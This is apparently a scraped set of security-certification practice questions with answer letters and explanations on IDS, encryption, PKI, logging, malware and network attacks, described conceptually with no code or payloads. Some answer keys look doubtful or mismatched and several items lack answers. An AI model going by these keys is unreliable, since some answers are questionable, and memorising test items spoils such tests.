OReilly Practice Tests

Ace your homework & exams now with Quizwiz!

Which of the following equations represents the complexity of a password policy that enforces a lowercase password using the letters a through z, where "n" is the password length?

26 ^ n

What should be incorporated with annual awareness security training? Signing of a user agreement Implementation of security controls User rights and permissions review Succession planning

A

Which of the following defines the difference between a Trojan horse and a worm? (Select the best answer.)A. Worms self-replicate but Trojan horses do not.B. The two are the same.C. Worms are sent via e-mail; Trojan horses are not.D. Trojan horses are malicious attacks; worms are not.

A

Which of the following invalidates SQL injection attacks that were launched from a lookup field of a web server? Input validation Security template NIDS Buffer overflow protection

A

Which protocol is based on SSH? SFTP TFTP FTP FTPS

A

You are designing security for an application. You need to ensure that all tasks relating to the transfer of money require actions by more than one user through a series of checks and balances. What access control method should you use? Separation of duties Implicit deny Job rotation Least privilege

A

You have been alerted to suspicious traffic without a specific signature. Under further investigation, you determine that the alert was a false indica- tor. Furthermore, the same alert has arrived at your workstation several times. Which security device needs to be configured to disable false alarms in the future? (Select the best answer.) A. Anomaly-based IDSB. Signature-based IPSC. Signature-based IDSD. UTM E. SIEM

A

You suspect a broadcast storm on the LAN. Which tool is required to di- agnose which network adapter is causing the storm?A. Protocol analyzerB. FirewallC. Port scanner D. Network intrusion detection systemE. Port mirror

A

Which of the following best describes a backdoor? Code inserted into software that initiates one of several types of functions when specific criteria are met Computer programs used to bypass normal authentication or other security mechanisms in place Code that restricts access to a computer and makes demands for money A group of compromised computers

B

Which of the following methods will identify which services are running on a computer? Calculate risk Determine open ports Review baseline reporting Review firewall logs

B

What is the best way to prevent ARP poisoning across a network? MAC flooding Log analysis Loop protection VLAN segregation

D. By segregating a network into multiple virtual LANs, ARP poisoning attacks hopefully will falter when trying to cross from one VLAN to the next. This isn't always successful, but it is one smart way to try to avoid ARP poisoning attacks.

Your organization has implemented cloud computing. Which of the following security controls do you no longer possess? Logical control of data Physical control of data Administrative control of data Executive control of data

B

A recent security audit has uncovered an increase in the number MITM attacks during the certificate validation process. Which of the following is a way to add security to the certificate validation process to help detect and block many types of MITM attacks by adding an extra step beyond normal X.509 certificate validation? OID stapling SSH S/MIME Certificate pinning

D

Tim needs to collect data from users who utilize an Internet-based application. Which of the following should he reference before doing so? Secure code review SOX Acceptable use policy Privacy policy

D

What is a definition of implicit deny? Everything is denied by default All traffic from one network to another is denied. ACLs are used to secure the firewall. Resources that are not given access are denied by default.

D

What is the best reason for security researchers to use virtual machines? To offer a secure virtual environment where they can conduct online deployments To offer an environment where they can discuss security research To offer an environment where network applications can be tested To offer an environment where malware might be executed but with minimal risk to equipment

D

Which of the following OSI model layers is where SSL provides encryption? Network Application Transport Session

D

Which of the following provides a user with a rolling password for one-time use? PIV card CAC card Multifactor authentication RSA tokens

D

You are in charge of installing patches to servers. Which of the following processes should you follow before installing a patch? Due process Separation of duties Fault tolerance Change management

D

You are the security administrator for the company ABC Accounting, Inc. The IT director has given rights to you that allow you to review logs and update network devices only. Other rights are given out to network administrators for the areas that fall within their job description. What kind of access control is this? Job rotation Discretionary Mandatory vacation Least privilege

D

You surmise that a user's session was interrupted by an attacker who inserted malicious code into the network traffic. What attack has occurred? DoS Spoofing Phishing Man-in-the-middle

D

HIDS and NIDS are similar intrusion detection systems. However, one is for individual computers, and the other is for networks. Which of the following would a HIDS be installed to monitor? System files CPU performance Network adapter performance Temporary Internet files

A. A HIDS, or host-based intrusion detection system, is software installed to an individual computer to monitor important files and watch for intrusions. System files are some of the most important files that will be monitored by a HIDS. Temporary Internet files are not nearly as important and are usually removed automatically by way of a policy in many organizations. See the section titled "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: CPU and network adapter performance is usually monitored by some type of performance monitoring program; these are often built into the operating system.

What kind of attack would a flood guard protect a network from? SYN attack Xmas attack MITM attack Botnet

A. A SYN attack (also known as a SYN flood) is when a large amount of synchronization request packets are sent from a client to a server. To protect against this, SYN flood guards can be implemented within some firewalls or as separate devices altogether. If implemented on a firewall, some configuration is usually necessary. See the section titled "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: An Xmas attack (Christmas tree packet attack) is used to analyze TCP/IP responses. It might have many of the option bits in the header enabled, but it does not have the SYN flag set. MITM stands for man-in-the-middle, an attack that intercepts and modifies data traveling between a client and a server. A botnet is a group of compromised computers that jointly (and unknowingly) attacks single points of interest such as web servers.

What is the purpose of a chain of custody as it is applied to forensic image retention? To provide documentation as to who handled the evidence To provide a baseline reference To provide proof the evidence hasn't been tampered with To provide data integrity

A. A chain of custody is the chronological documentation of evidence. A procedure is involved when creating the chain of custody that logically defines how the documentation will be entered. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Baseline references and baseline reporting deal with checking the security posture of a system, as in a security posture assessment. To prove that the image hasn't been tampered with (to prove its integrity), a security professional will hash the image.

Which of the following would you most likely find in a buffer overflow attack? NOP instructions Sequence numbers IV length Set flags

A. A large number of No Operation instructions (known as NOP or no-op instructions) can be used to overflow a buffer, which could allow unwanted code to be executed or result in a denial of service (DoS). Large numbers of NOP instructions can be used to perform a NOP slide (or NO-OP sled). See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Sequence numbers are how TCP packets are numbered. IV length has to do with the length of a string in a cipher. Flags are one or more bits that are set to a binary number to indicate whether something is on or off.

When creating a public/private key pair, which of the following would an admin need to specify key strength? RSA AES DES SHA

A. RSA is the only cipher listed that deals with private and public keys; it is an asymmetric algorithm. When creating a certificate, the admin needs to specify the underlying algorithm (most likely RSA) and its key strength (most likely 2048-bit or higher). See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: AES and DES are symmetric algorithms—the admin does not select the key strength. SHA is a cryptographic hash function, and again, the admin does not select the key strength. These protocols (and their respective versions) are predetermined in their key length.

Jason is a security administrator for a company of 4000 users. He wants to store 6 months of security logs to a logging server for analysis. The reports are required by upper management due to legal obligations but are not time- critical. When planning for the requirements of the logging server, which of the following should not be implemented? A. Performance baseline and audit trailsB. Time stamping and integrity of the logsC. Log details and level of verbose loggingD. Log storage and backup requirements

A. A performance baseline and audit trails are not necessarily needed. Security logs are usually not performance-oriented. For example, you might get this list from a Windows Server's Security log in the Event Viewer. Audit- ing this much information could be unfeasible for one person. However, it is important to implement time stamping of the logs and store log details. Be- fore implementing the logging server, Jason should check whether he has enough storage and backup space to meet his requirements.

Your organization has several building keys circulating among various executive and human resources employees. You are concerned that the keys could be easily lost, stolen, or duplicated, so you have decided to implement an additional security control based on facial recognition. Which of the following will address this goal? Security guard Fingerprint scanner Mantraps Proximity readers

A. A security guard will be able to recognize the faces of the employees in the organization. Usually, the guard will consult a physical access list on paper or on the computer to identify the employee. The guard might view the employee directly, through privacy glass, or via CCTV. Facial recognition can also be accomplished through advanced biometric systems, but these can be very costly to an organization.

Which of these is a true statement concerning active interception? A. When a computer is put between a sender and receiverB. When a person overhears a conversationC. When a person looks through filesD. When a person hardens an operating system

A. Active interception normally includes a computer placed between the sender and the receiver to capture information. All other statements con- cerning active interception are false. If a person overhears a conversation it can be considered eavesdropping. When a person looks through files it could be normal or malicious. When a person hardens an operating system, that person is making it more secure. We discuss these concepts as we progress through the book.

You have collected login information, file access information, security log files, and unauthorized security violations. What is this collection known as? Audit trail Audit Access control list Security log

A. An audit trail is a collection of security log files, unauthorized security violations, and other logged information such as successful or failed logins. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The audit is the technical assessment made of applications, files, and networks; quite often this includes an audit trail. An access control list (ACL) is a set of rules or permissions. The security log is the log file in Windows (found in the Event Viewer) that shows security violations or allowed access whether they succeeded or not; it works when auditing has been turned on.

Which of the following is the most complicated centralized key management scheme? Asymmetric Symmetric Whole disk encryption Steganography

A. Asymmetric systems such as PKI (public-key infrastructure) have a complicated centralized key management scheme.

Which of the following security actions should be completed before a user is given access to the network? Identification and authentication Authentication and authorization Identification and authorization Authentication and biometrics

A. Before users are given access to a network, they need to identify themselves in one or more ways and be authenticated via whatever system is in place. After they are given access to the network, they can later be authorized to individual resources. The authentication step cannot be skipped.

Which of the following protocols or services uses port 19? CHARGEN Echo Telnet SMTP

A. CHARGEN, the character generator, uses port 19. It is commonly used by a Fraggle attack. See the section titled "Ports and Protocols" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: Echo uses port 7. Telnet uses port 23. SMTP uses port 25.

Which one of the following is the most common encryption protocol used for key exchange during a secure web session? RSA AES SHA PKI

A. Explanation: The RSA encryption protocol is an asymmetric algorithm used for the key exchange during secure web sessions. Other options for key exchange include Diffie-Hellman and elliptic curve, with or without ephemeral properties.

You are surprised to notice that a co-worker's computer is communicating with an unknown IRC server and is scanning other systems on the network. None of this was scheduled by anyone in your organization, and the user appears to be unaware of what is transpiring. What is the most likely cause? The computer is part of a botnet. The computer is infected with a worm. The computer is infected with spyware. The computer is infected with a rootkit.

A. If the computer in question is scanning the network and accessing an unknown IRC server without the user's knowledge, then the computer has probably been compromised as a zombie and is now part of a botnet. The IRC server probably acts as a central communication point for all zombies in the botnet. See the section titled "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Though the computer had to be infected with some kind of payload originally, that malware is not responsible for the events that are transpiring currently.

NTLM is for the most part backward compatible and is an improved version of which of the following? LANMAN AES MD5 passwd

A. LANMAN is an outdated hash used in Windows; it is the original hash used to store passwords. The NTLM (and the newer NTLMv2) hash is used in newer versions of Windows to replace LANMAN.

Rick is reviewing the logs of a host-based IDS. They show that the computer has been compromised by a botnet and is communicating with a master server. If Rick needs to power the computer off, which of the following types of data will be unavailable? Memory, system processes, and network processes Memory, archival storage, and temporary files Swap files, system processes, and the master boot record The system disk, e-mail, and log files

A. Memory is cleared when the computer is shut down (unless hibernation mode has been implemented). This removes system and network processes from memory. See the section titled "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Archival storage, the master boot record, system disk, e-mail, and log files will still be available. Although two other answers had possibilities within them, they weren't altogether correct.

Your organization hires temporary users to assist with end-of-year resources and calculations. All the temporary users need access to the same domain resources. These "temps" are hired for a specific period of time with a set completion date. Users log on to a Windows domain controlled by a Windows Server domain controller. Your job is to make sure that the accounts can be used only during the specific period of time for which the temps are hired. The solution you select should require minimal administrative effort and upkeep. Of the following, what is the best solution? Configure expiration dates for the temp user accounts Configure password expiration dates for temp user accounts Configure a domain password policy for the temp user accounts Configure a local password policy on the computers used by temp user accounts Delete the temp user accounts at the end the work period

A. One easy solution is to configure expiration dates for the temp user accounts. This can be done within the Account tab of each user's Properties window. This way, the users cannot log on to the domain after their work period has ended. See the section "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: You cannot configure password expiration dates for the user accounts within the user's Properties window; however, you can configure a policy with a password expiration date, but you have to make additional configurations for this to work properly. By default, the users would simply be asked to change their password when the password expiration date arrives. Password policies can be configured in the same manner (password expiration dates and so on), but they have the same problems as well. Deleting user accounts is usually not a good idea; organizations will generally disable accounts so that they can audit any actions the user accounts have taken in the past. Deleting a user account will make auditing difficult.

Which of the following requires a CA during the authentication process? PEAP-TLS FTPS explicit FTPS implicit MD5

A. PEAP (Protected Extensible Authentication Protocol) creates a TLS (Transport Layer Security) tunnel by acquiring a PKI certificate from a CA. It is known simply as PEAP or as PEAP-TLS. It is similar to EAP-TTLS. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: FTPS is FTP over SSL. Explicit mode means that the FTPS client must explicitly request security from the FTPS server. Implicit FTPS connections do not allow negotiation—there is no request for security; it is expected from the server. MD5 is a cryptographic hash function.

You have established a baseline for your server. Which of the following is the best tool to use to monitor any changes to that baseline?A. Performance MonitorB. Anti-spyware C. Antivirus softwareD. Vulnerability assessments software

A. Performance monitoring software can be used to create a baseline and monitor for any changes to that baseline. An example of this would be the Performance console window within Windows Server. (It is commonly re- ferred to as Performance Monitor.) Antivirus and anti-spyware applications usually go hand-in-hand and are not used to monitor server baselines. Vul- nerability assessing software such as Nessus or Nmap is used to see whether open ports and other vulnerabilities are on a server.

You need to control access to a network through a Cisco router. Which of the following authentication services should you use? TACACS+ SSH Telnet SNMP

A. TACACS+ is commonly used to control access to networks through Cisco routers.

Your organization has a policy that states that user passwords must be at least 16 characters. Your computers use NTLM2 authentication for clients. Which of the following hash algorithms will be used for password authentication? MD5 AES LM hash SHA

A. The MD5 hashing algorithm is used by NTLM2 authentication. MD5 stands for Message-Digest algorithm 5. It uses a 128-bit key and is a widely used hashing algorithm. LM hash is used with passwords of 14 or fewer characters. If you use a password of 15 characters or more on newer versions of Windows, the OS will store a constant string as the LM hash, which is effectively a null password, and thereby uncrackable. The real password will be stored as an NTLM2 hash and (in this case calculated with MD5) will be used solely. See the section titled "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: AES is the Advanced Encryption Standard, used widely in wireless networks. SHA is the Secure Hash Algorithm, SHA-1 employs a 160-bit hash that is deprecated. Newer versions of SHA are more secure than MD5.

Which of the following log files identifies when a computer was last shut down? System Security Application Directory Services

A. The System log file shows when a computer was started or shut down. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The Security log file shows audit entries. The Application log file shows changes, warnings, or errors to applications built into Windows and third-party applications. The Directory Services log file shows events, warnings, and errors that occur on a domain controller.

You have been tasked with providing a staff of 250 employees secure remote access to your corporate network. Which of the following is the best solution? VPN concentrator Web security gateway Web proxy Software-based firewall

A. The VPN concentrator is the best solution listed. A hardware device such as this can handle 250 concurrent, secure, remote connections to the network. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Web security gateways are used to block access to specific websites. Web proxies cache website content for later use. Software-based firewalls can allow for remote secure access but not for the number of concurrent connections needed. A hardware-based firewall or VPN concentrator is the best solution.

Which of the following is the best practice to secure log files? Copy the log files to a server in a remote location. Log all failed and successful login attempts. Increase the size of the log files. Perform hashing of the log files.

A. The best practice to securing log files is to make sure they are copied to a remote location—better yet to another server in a remote location—where they can be easily accessed if the original server fails. This remote location should be in another city, not across the street in another building.

A user receives an encrypted message that was encrypted using asymmetric cryptography. What does this recipient need to decrypt the message? Recipient's private key Recipient's public key Sender's private key Sender's public key

A. The recipient's private key is necessary to decrypt the message. The recipient's private key is part of a key pair that also includes the public key that was used to encrypt the message.

Which of the following ports is required by an e-commerce web server running SSL? Port 443 inbound Port 80 inbound Port 80 outbound Port 443 outbound

A. The web server needs to have inbound port 443 open to accept secure requests for SSL sessions from clients. See the section titled "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: The outbound port doesn't actually matter; it's the inbound port that is important for the server. Inbound port 80 is used by default for regular HTTP connections.

Your boss needs you to implement a password policy that prevents a user from reusing the same password. To be effective, the policy must be implemented in conjunction with the password history policy. Which of the following is the best method? Minimum age Expiration time Password length Lockout time

A. This question refers to Windows Server products. The minimum age password policy setting must be set to enforce an effective password history policy. If this is not done (in conjunction with the password history policy), then the user will be able to reuse old passwords. For example, if the minimum age was set to the default of zero, then the user could simply change his password as many times as needed, without waiting, to get past the password history policy, and ultimately reuse an old password. The minimum age must always be less than the maximum age setting and must be more than zero to enforce a password history policy properly.

Why would you use a vulnerability scanner? To identify open ports on a computer To identify remote access policies To crack passwords To see whether passwords are sent as clear text

A. Vulnerability scanners are primarily used to find open ports on a computer and define what threats are associated with those ports. See the section titled "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Remote access policies should be identified within the server where the policy was created (for example, in Windows Server). Password recovery programs such as John the Ripper should be used to crack passwords. To see whether passwords are being sent as clear text, you should use a protocol analyzer.

You have been given the task of scanning for viruses on a PC. What is the best of the following methods? A. Recovery environmentB. Dual-boot into LinuxC. Command Prompt onlyD. Boot into Windows normally

A. You should use a recovery environment. Most often, this would be the one built into Windows. Many manufacturers suggest using this, and more specifically Safe Mode. However, it could also be a Linux rescue disc or flash drive. That's not a true dual-boot though. An actual dual-boot is when Windows and Linux are both installed to the hard drive. Command Prompt only is not enough, nor is it necessary for some virus scanning scenarios. Booting into Windows normally is tantamount to doing nothing. Remember to use a recovery environment when scanning for viruses.

Mitigating risk based on cost could be described as which of the following? Business impact analysis Quantitative risk assessment Vulnerability assessment Qualitative risk assessment

B

Why do hackers often target nonessential services? Select 2 answers. Quite often, they are not configured correctly. They are not monitored as often. They are not used. They are not monitored by an IDS.

AB. Nonessential services are often not configured and secured by the network administrator; this goes hand in hand with the fact that they are not monitored as often as essential services. It is imperative that network administrators scan for nonessential services and close any corresponding ports. See the section "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Even though services may be nonessential, that doesn't necessarily mean that they are not used. An IDS, if installed properly, should monitor everything on a given system.

Which of the following requires a baseline? (Select the two best answers.)A. Behavior-based monitoringB. Performance MonitorC. Anomaly-based monitoringD. Signature-based monitoring

AC.

Which of the following protocols does the 802.11i standard support? (select two) AES RSA TKIP ECC DES

AC. AES (Advanced Encryption Standard) and TKIP (Temporal Key Integrity Protocol) are supported by the 802.11i standard, which deals with wireless transmissions. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: RSA deals with the encrypting of data through the use of tokens. ECC (elliptic curve cryptography) and DES are also used to encrypt data.

Which of the following would be considered detrimental effects of a virus hoax? (Select the two best answers.)A. Technical support resources are consumed by increased user calls.B. Users are at risk for identity theft.C. Users are tricked into changing the system configuration.D. The e-mail server capacity is consumed by message traffic.

AC. Because a virus can affect many users, technical support re- sources can be consumed by an increase in user phone calls. This can be detrimental to the company because all companies have a limited number of technical support personnel. Another detrimental effect is that unwitting users may be tricked into changing some of their computer system configu- rations. The key term in the question is "virus hoax." The technical support team might also be inundated by support e-mails from users, but not to the point where the e-mail server capacity is consumed. If the e-mail server is consumed by message traffic, that would be a detrimental effect caused by the person who sent the virus and by the virus itself but not necessarily by the hoax. Although users may be at risk for identity theft, it is not one of the most detrimental effects of the virus hoax.

Mark works for a financial company. He has been tasked to protect customer data. He decides to install a mantrap and an HVAC system in the data center. Which of the following concepts has he addressed? (select two) Availability Integrity Confidentiality Recovery Accountability

AC. The HVAC system addresses the need for availability of data. Without a proper HVAC system, a data center's servers (and other equipment) would probably overheat, resulting in a loss of service. The mantrap addresses the need for confidentiality. Customer data in financial organizations, health insurance companies, and many other organizations requires privacy and confidentiality. By installing a mantrap, unauthorized persons will be detained and won't be able to access customer data.

Which of the following security technologies should you provide to allow users remote access to your network? (select two) Firewall Subnetting NAT VPN NAC

AD. A firewall can be used in conjunction with a virtual private network (VPN) service to allow users remote access to your network. The firewall might incorporate the VPN, or the VPN might be controlled by a separate server or concentrator. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Subnetting is not necessary for remote access, but it is a security method used to compartmentalize networks. Network address translation (NAT) is used to translate LAN addresses through to the Internet. Network access control (NAC) is used to authenticate computers and users in a secure fashion on the LAN.

Which of the following encryption algorithms are supported by the IEEE 802.11i standard? (select two) TKIP RSA ECC AES

AD. The IEEE 802.11i standard amends the original 802.11 standard and was later incorporated into the IEEE 802.11-2007 standard. It specifies security mechanisms for wireless networks, including TKIP and AES. It also deprecates WEP. TKIP, the Temporal Key Integrity Protocol, is used as a solution to replace WEP without requiring any replacement of older hardware. Although it is a better solution than WEP, TKIP was deprecated in 2009 by the IEEE—CCMP is recommended in its place. (CCMP stands for Counter Mode Cipher Block Chaining Message Authentication Code Protocol.) AES, the Advanced Encryption Standard, is the superior type of encryption to use in wireless networks. It works with WPA and WPA2 but might require hardware upgrades. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: RSA (Rivest, Shamir, Adleman) is a public-key cryptography algorithm commonly used on the Internet and considered to be unbreakable if used properly. ECC, which stands for elliptic curve cryptography, is another type of public-key cryptography, but this is based on the structure of an elliptic curve and mathematical problems.

Which of the following would an antivirus program most likely not detect? Select 2 answers. Logic bomb Worm Virus Trojan Pharming

AE. Antivirus programs are meant to scan for viruses, worms, and Trojans. They are least likely to discover logic bombs because logic bombs don't manifest themselves right away.

. Your boss wants you to properly log what happens on a database server. What are the most important concepts to think about while you do so? (Se- lect the two best answers.) A. The amount of virtual memory that you will allocate for this taskB. The amount of disk space you will requireC. The information that will be needed to reconstruct events laterD. Group Policy information

B and C. It is important to calculate how much disk space you will re- quire for the logs of your database server and verify that you have that much disk space available on the hard drive. It is also important to plan what in- formation will be needed in the case that you need to reconstruct events lat- er. Group Policy information and virtual memory are not important for this particular task.

Of the following, which two security measures should be implemented when logging a server? (Select the two best answers.)A. Cyclic redundancy checksB. The application of retention policies on log filesC. Hashing of log files D. Storing of temporary files

B and C. The log files should be retained in some manner either on this computer or on another computer. By hashing the log files, the integrity of the files can be checked even after they are moved. Cyclic redundancy checks, or CRCs, have to deal with the transmission of Ethernet frames over the network. Temporary files are normally not necessary when dealing with log files.

1. Which of the following is a record of the tracked actions of users? A. Performance MonitorB. Audit trailsC. PermissionsD. System and event logs

B.

Which of the following algorithms depends on the inability to factor large prime numbers? AES RSA Elliptic curve Diffie-Hellman

B.

Jane is a systems administrator and must revoke the access of a user who has been terminated. Which policy must she implement? Password recovery Password expiration Account disablement Account lockout

C

The server room is on fire. What should the HVAC system do? Increase the humidity. Increase the heat. Turn off. Turn on the AC.

C

Which of the following authentication protocols makes use of a supplicant, authenticator, and authentication server? Kerberos 802.1X RADIUS LDAP

B. 802.1X makes use of three components: a supplicant, which is software running on a workstation; an authenticator, which is a wireless access point or switch; and an authentication server, which is an authentication database, most likely a RADIUS server. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Kerberos makes use of a key distribution center that works with tickets to prove the identity of users. RADIUS provides centralized administration of dial-up, VPN, and wireless authentication and can be used with 802.1X and EAP (Extensible Authentication Protocol). LDAP (Lightweight Directory Access Protocol) can access and modify directory services data.

What are the minimum requirements for a cold site? Location near the data center that meets power requirements Location that meets power and connectivity requirements Location with all required equipment loaded with all updates Location with duplicate systems

B. A cold site only requires power and connectivity.

You have been contracted to determine if network activity spikes are related to an attempt by an attacker to breach the network. The customer wants you to identify when the activity occurs and what type of traffic causes the activity. Which type of tool should you use? Network mapper Protocol analyzer System Monitor Performance Monitor

B. A protocol analyzer will capture packets and timestamp each one. This tells you exactly what type of packets were captured and when. If the timestamps correspond to the network activity spikes, you know you have a match for the time. By digging into the packets with a protocol analyzer, you can find out exactly what type of traffic is causing the activity.

Which of the following encryption protocols is the strongest and can encrypt data with the least amount of CPU usage? DES AES 3DES RC4

B. AES, the Advanced Encryption Standard, is currently considered to be the strongest symmetric encryption protocol. It can also encrypt data with the least amount of CPU usage compared to the rest of the listed answers. This makes it a great choice for wireless networks, whole disk encryption, and so on. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: DES and its successor 3DES were the predecessors to AES. Both of them are considered deprecated, weaker encryption protocols and require more CPU usage than AES. RC4 is a symmetric stream cipher used with SSL and WEP. It is known for its speed, but when used with WEP, it can be cracked easily.

Dan is a network administrator. One day he notices that his DHCP server is flooded with information. He analyzes it and finds that the informa- tion is coming from more than 50 computers on the network. Which of the following is the most likely reason? A. VirusB. WormC. ZombieD. PHP script

B. B. A worm is most likely the reason that the server is being bombarded with information by the clients; perhaps it is perpetuated by a botnet. Be- cause worms self-replicate, the damage can quickly become critical.

After auditing an FTP server, you note that the server has an average of 100 concurrent connections. Where should you look to determine whether this is normal or whether your FTP server is being attacked? Secure code review Baseline reporting Security policy DRP

B. Baseline reporting will tell you what has happened in the past on your FTP server. By creating a baseline, you can compare current results with past results, helping you to determine whether the activity is normal.

A critical system in the server room was never connected to a UPS. The security administrator for your organization has initiated an authorized service interruption of the server to fix the problem. Which of the following best describes this scenario? Succession planning Fault tolerance Continuity of operations Disaster recovery

B. Because the security administrator is deliberately interrupting service in a proactive effort to fix the problem, this scenario would be best described as fault tolerance. Also, the fact that a UPS is being installed to make the system tolerant of power loss lends to the fault tolerance answer. See the section titled "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: If the administrator was planning how to implement a new server, then it would be succession planning. Continuity of operations and disaster recovery deal with the scenario of an actual disaster and the planning for recovery from that disaster.

Your boss's smartphone is encrypted and has screen lock protection, yet data was still stolen from it. How is this possible? Botnet Bluesnarfing SIM cloning GPS tracking

B. Bluesnarfing is an attack that can steal data such as phonebook contacts, calendar information, and so on, regardless of the phone's encryption and screen lock. To protect against this, set the smartphone to undiscoverable and use a hard-to-guess Bluetooth pairing key.

Which of the following is not a record of the tracked actions of users? Previous logon notification Audit trails Application log Security log

C

Which of the following is most likely to result in data loss? Accounting personnel transferring confidential staff information with SFTP Developers copying data from production to test environments with USB sticks Encrypted backup tapes left unattended at reception for offsite storage Back office staff updating details on a mainframe with SSH

B. By default, if data is copied to a USB stick, it is not encrypted. There is virtually no security in this scenario, and the worst part is that the USB sticks are physically traveling from one department to another. To rectify the situation, the developers could consider using AES-256 to encrypt the data on the USB flash drives. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: The accounting personnel are using SFTP, the backup tapes are encrypted, and the back office staff is using SSH. All these other scenarios at least have some kind of security in mind.

An employee has been terminated from your organization. What can ensure that the organization continues to have access to the employee's private keys? Store the keys in a CRL Store the keys in escrow Delete the employee's user account Retain the employee's token

B. By storing the keys in escrow, the organization can continue to have access to them, even after the employee has been terminated. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A CRL is a certificate revocation list, which stores certificates that have been revoked; for many different reasons, these certificates are no longer in circulation. Usually organizations will have a policy stating that employees' user accounts should not be deleted. By not deleting the user account, it will continue to be linked to the user's private keys and to any logged auditing information associated with the employee. Generally, when an employee is terminated, the hardware token and user's account will be disabled. A hardware token deals with a different technology than private keys being stored in escrow. The proper place to access the employee's private keys is within escrow within a PKI.

Whitelisting, blacklisting, and closing open relays are all mitigation tech- niques addressing what kind of threat? A. SpywareB. SpamC. VirusesD. Botnets

B. Closing open relays, whitelisting, and blacklisting are all mitigation techniques that address spam. Spam e-mail is a serious problem for all com- panies and must be filtered as much as possible.

Which of the following web application security weaknesses can be mitigated by preventing the usage of HTML tags? SQL injection Cross-site scripting LDAP injection Rootkits

B. Cross-site scripting (XSS) is an attack on website applications that injects client-side script into web pages. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: SQL injection is a type of code injection that exploits vulnerabilities in databases. LDAP injection can be used to modify LDAP statements and modify the LDAP tree. Rootkits are software designed to gain administrator-level access over a computer system.

You have been given ten hard drives that need to be decommissioned. What is the first thing you should do? Format the hard drive. Perform a bit-level erasure or overwrite the drive. Contact a waste disposal facility. Burn the hard drives in an incinerator.

B. Hard drives should be sanitized. This can be done with bit-level erasure software that completely obliterates any data that was previously on the drive. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Formatting the drive is not sufficient because data can still be recovered from a formatted drive. Even if you plan to dispose of the drives with a third-party facility, the drive should still be sanitized beforehand. Most organizations will not burn hard drives. It might even be illegal in your municipality. Instead, after sanitization, hard drives are often pulverized.

You have been asked by your boss to protect the confidentiality of sensitive data entered into a database table. What is the best method to use? Encryption Hashing Secure Copy Biometrics

B. Hashing is used in databases for indexing and file retrieval and is used to protect the confidentiality of data in database tables. It is faster and easier to use than encryption methods. See the section titled "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Encryption is commonly used to protect the confidentiality of data files but is perhaps not the best option for information that is integral to database tables. Secure Copy (SCP) is used to securely transfer files between two computers. Biometrics is the science of identifying humans from their physical characteristics.

You have been tasked with providing daily network usage reports of lay- er 3 devices without compromising any data during the information gather- ing process. Which of the following protocols should you select to provide for secure reporting in this scenario? A. ICMPB. SNMPC. SNMPv3D. SSH

C

Jennifer has been tasked with configuring multiple computers on the WLAN to use RDP on the same wireless router. Which of the following might be necessary to implement? Enable a DMZ for each wireless computer. Forward each computer to a different RDP port. Turn off port forwarding for each computer. Turn on AP isolation on the wireless router.

B. If there are multiple computers allowing incoming Remote Desktop Protocol (RDP) sessions on the WLAN, you might have to configure the wireless router to forward each computer to a different RDP port. For example, the standard RDP port is 3389 (also known as Terminal Services). If that is open on the router, then clients on the Internet will be able to initiate RDP sessions to your network. But usually, the port on the router can only be forwarded to one computer. It might be necessary to set up additional port numbers and have each one map to a separate computer on the WLAN. Of course, the users on the Internet would need to know the special port number that corresponds to the computer they want to connect to. Often this will be used for remote access by the employee who would otherwise be working at the computer in the office.

Which of the following is a disadvantage of PGP? Weak encryption can be easily broken A recipient must trust a public key that is received. Private keys can be compromised. Man-in-the-middle attacks are common.

B. In PGP (Pretty Good Privacy), a user must trust any public keys that are received to access data from the sender. There is no centralized key distribution in PGP. It uses a web of trust. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: PGP is based on RSA encryption; as long as the RSA encryption is implemented properly, it should be uncrackable under normal circumstances (and as of the writing of this book), or at the very least, if implemented properly, will not be "weak" encryption. Private keys are just that, private. They should not be compromised. Man-in-the-middle attacks are not common with PGP; however, PGP has been known to be vulnerable to cryptanalysis attacks through use of Trojan horses.

Your web server's private key has been compromised by a malicious intruder. What, as the security administrator, should you do? Issue a new CA. Submit the public key to the CRL. Submit the private key to the CRL. Use key escrow.

